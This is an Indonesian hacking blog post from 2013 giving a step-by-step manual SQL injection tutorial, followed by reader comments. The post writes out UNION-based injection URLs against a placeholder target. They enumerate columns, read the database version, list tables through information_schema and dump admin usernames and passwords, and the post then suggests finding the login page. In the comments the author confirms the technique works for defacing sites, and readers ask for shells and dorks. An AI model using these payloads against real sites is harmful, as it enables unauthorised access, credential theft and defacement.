Powered by Blogger.
» » Cara Manual SQL Injection

Cara Manual SQL Injection





Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.

Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

Apa itu SQL injection ?

SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error.
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya. Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya. Tinggal nyari halaman loginnya. Bisa pake admi finder atau BackTrack
Anda baru saja membaca artikel yang berkategori Hacking dengan judul Cara Manual SQL Injection. Anda bisa bookmark halaman ini dengan URL https://forbidden007.blogspot.com/2013/05/cara-manual-sql-injection.html. Terima kasih!
Ditulis oleh: wh0cares - Saturday, May 4, 2013

55 komentar untuk "Cara Manual SQL Injection"

  1. HambaAllahMay 4, 2013 at 6:28 AM

    waahhh manteb nih tutor :D

    ReplyDelete
  2. AnwarMay 4, 2013 at 4:44 PM

    Wah pasti yg punya blog heker yaa

    ReplyDelete
  3. AnonymousMay 5, 2013 at 8:51 AM

    pake live target dong kak :) biar semakin paham :)

    ReplyDelete
  4. AnonymousMay 7, 2013 at 8:11 PM

    kak share ttg metode SQLi yg laen juga dong

    ReplyDelete
  5. AnonymousMay 7, 2013 at 8:12 PM

    ini bisa buat deface web ya? maklum newbie

    ReplyDelete
    Replies
    1. wh0caresMay 8, 2013 at 12:52 AM

      bisa kak :) harus sedikit bersabar tapi :D

      Delete
  6. AnonymousMay 7, 2013 at 8:13 PM

    kasih tutorial upload shell juga dong

    ReplyDelete
  7. AnonymousMay 7, 2013 at 8:14 PM

    share ttg metode deface yg laen dong

    ReplyDelete
  8. HackerMay 7, 2013 at 8:16 PM

    work gan.. sippp

    ReplyDelete
  9. AnonymousMay 7, 2013 at 8:17 PM

    ga maksud kak :v

    ReplyDelete
    Replies
    1. wh0caresMay 8, 2013 at 12:54 AM

      emang sedikit agak susah :) dipahami dulu aja :)

      Delete
  10. AnonymousMay 7, 2013 at 8:19 PM

    artikelnya bermanfaat... sangat membantu

    ReplyDelete
  11. AnonymousMay 7, 2013 at 8:19 PM

    minta shellnya gan

    ReplyDelete
    Replies
    1. wh0caresMay 8, 2013 at 12:55 AM

      buat sendiri atau cari di google banyak :v

      Delete
  12. AnonymousMay 7, 2013 at 8:21 PM

    ada yg software ga? males klo manual

    ReplyDelete
  13. AnonymousMay 7, 2013 at 8:23 PM

    share teknik yg laen juga dong

    ReplyDelete
  14. AnonymousMay 7, 2013 at 8:24 PM

    share dorknya juga dong

    ReplyDelete
  15. AnonymousMay 7, 2013 at 8:27 PM

    tulis artikel cara menggunakan sqlmap yg lengkap yaa, btw nice post

    ReplyDelete
  16. HackerIDMay 7, 2013 at 8:29 PM

    nice artikel, visit back!

    ReplyDelete
  17. AnonymousMay 7, 2013 at 8:30 PM

    share teknik RFI dan LFI juga dong

    ReplyDelete
  18. AnonymousMay 7, 2013 at 8:31 PM

    pro pasti nih

    ReplyDelete
  19. AnonymousMay 7, 2013 at 8:32 PM

    saran : jangan deface situs indonesia :)

    ReplyDelete
  20. AnonymousMay 7, 2013 at 8:34 PM

    setuju sama yg diatas ajalah °˚˚ºo(•̃͡-̮•̃͡) hέhέhέ (•̃͡-̮•̃͡)oº˚˚° :p

    ReplyDelete
  21. AnonymousMay 7, 2013 at 8:35 PM

    share juga ttg cara ngehindari SQLi di website dong

    ReplyDelete
  22. AnonymousMay 10, 2013 at 8:37 PM

    wah heker pro nih pasti

    ReplyDelete
  23. AnonymousMay 10, 2013 at 8:39 PM

    share trik yg laen dong

    ReplyDelete
  24. AnonymousMay 10, 2013 at 8:41 PM

    wow haikal awas ntar ditangkep kek wildan wkwkwkwkwkwkk

    ReplyDelete
  25. AnonymousMay 10, 2013 at 8:43 PM

    MyanLamers.. fireee!!!

    ReplyDelete
  26. AnonymousMay 10, 2013 at 8:46 PM

    keren gann :D

    ReplyDelete
  27. UnknownMay 13, 2013 at 4:24 AM

    ajayin dong kk

    ReplyDelete
  28. AnonymousDecember 9, 2014 at 8:20 PM

    hasil copas...

    ReplyDelete

Subscribe to: Post Comments (Atom)